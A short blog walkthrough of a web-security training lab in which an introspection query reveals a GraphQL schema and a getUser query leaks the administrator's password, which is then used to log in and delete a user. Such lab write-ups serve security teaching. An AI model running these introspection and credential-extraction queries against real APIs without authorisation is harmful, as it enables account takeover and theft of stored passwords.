Lab: Accidental exposure of private GraphQL fields

Source: Dev.to

Lab Overview

The user‑management functions for this lab are powered by a GraphQL endpoint. An access‑control vulnerability allows the API to reveal private credential fields. The goal is to sign in as the administrator and delete the username carlos.

Lab link:

Accessing the GraphQL Endpoint

1. Open My account and attempt a login with any credentials.
2. The login request is a POST to /graphql containing a GraphQL mutation with username and password.
3. The mutation fails to authenticate, but the request still reaches the GraphQL server.

Introspection

The server has introspection enabled, allowing the full schema to be discovered.

1. Intercept the login mutation in your proxy (e.g., Burp Suite).
2. Send the intercepted request to the Repeater.
3. In the request body, right‑click → GraphQL → Set introspection query.
4. Send the request. The response returns the complete schema.

Tip: Use the InQL browser extension to view the schema more conveniently.

Exploiting the Vulnerability

The getUser query contains sensitive fields (username, password). Craft a query to retrieve them:

query {
  getUser(id: 1) {
    username
    password
  }
}

Send this query to the /graphql endpoint (e.g., via the Repeater or a GraphQL client). The response reveals the administrator’s username and password.

Solution

1. Log in as the administrator using the leaked credentials.
2. Delete the user with the username carlos.

The lab is then marked as complete.